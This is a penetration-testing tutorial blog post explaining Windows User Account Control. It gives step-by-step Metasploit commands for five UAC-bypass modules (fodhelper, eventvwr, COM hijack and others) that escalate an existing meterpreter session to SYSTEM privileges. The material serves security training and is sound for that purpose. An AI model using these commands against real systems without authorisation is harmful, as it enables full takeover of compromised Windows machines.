Privilege Escalation

Multiple Ways to Bypass UAC using Metasploit

In this Post, we are shedding light on User Account Control shortly known as UAC. We will also look at how it can potentially protect you from malicious software and ignoring UAC prompt can trouble your system.

Table of Content

Introduction to UAC

  • What is UAC?
  • Working of UAC

Techniques 

  1. Windows Escalate UAC Protection Bypass
  2. Windows Escalate UAC Protection Bypass (In Memory Injection)
  3. Windows UAC Protection Bypass (Via FodHelper Registry Key)
  4. Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
  5. Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

Introduction to User Account Control

What is User Account Control?

A well-structured User Account Control introduced with Microsoft’s Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is foreseen and requires a minimal effort.

In other words, it is a security feature of Windows which supports I preventing unauthorized modifications to the operating system UAC makes sure that the certain changes are made only with authorization from the administrator. If the changes are not permitted by the administrator, they are not executed, and Windows remains unchanged.

How does UAC work?

UAC works by preventing a program from carrying out any tasks which involve system changes/specific tasks. The operations which will not work unless the process attempting to carry them out is running with administrator rights. If you run a program as administrator, it will have more privileges since it would be “elevated”, compared to the programs running which are not running as administrator.

Some things which cannot be done without administrator rights:

  • Registry modifications (if the registry key is under e.g. HKEY_LOCAL_MACHINE (since it affects more than one user) it will be read-only)
  • Loading a device driver
  • DLL injection
  • Modifying system time (clock)
  • Modifying User Account Control settings (via Registry, it can be enabled/disabled but you need the correct privileges to do this)
  • Modify protected directories (e.g. Windows folder, Program Files)
  • Scheduled tasks (e.g. to auto-start with administrator privileges)

UAC won’t just automatically block malicious software, the purpose wasn’t to determine if a program is malicious or not. It’s down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation. 

//malwaretips.com/threads/why-uac-is-important-and-how-it-can-protect-you.47157/

Techniques 

Firstly exploit the target machine to obtain the meterpreter. Once you get the meterpreter session 1 then type the following command to check system authority and privileges.

getsystem
getuid

If you don’t have system/admin authorities and privileges. Then you should go for bypass UAC Protection of the targeted system.

Windows Escalate UAC Protection Bypass

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit

From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command, you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (In Memory Injection)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit

From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Ultimately you will get NT AUTHORITY\SYSTEM Privilege, now if you will run “shell” command, you will get access of command prompt with administrator privilege.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit

From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command,  you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

And again you will get NT AUTHORITY\SYSTEM Privilege.

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.

msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit

From the given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem
getuid

Finally, you will get NT AUTHORITY\SYSTEM Privilege, now if you will again run “shell” command then you will get access of command prompt with administrator privilege and this way we can help of Metasploit post exploit to bypass UAC protection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here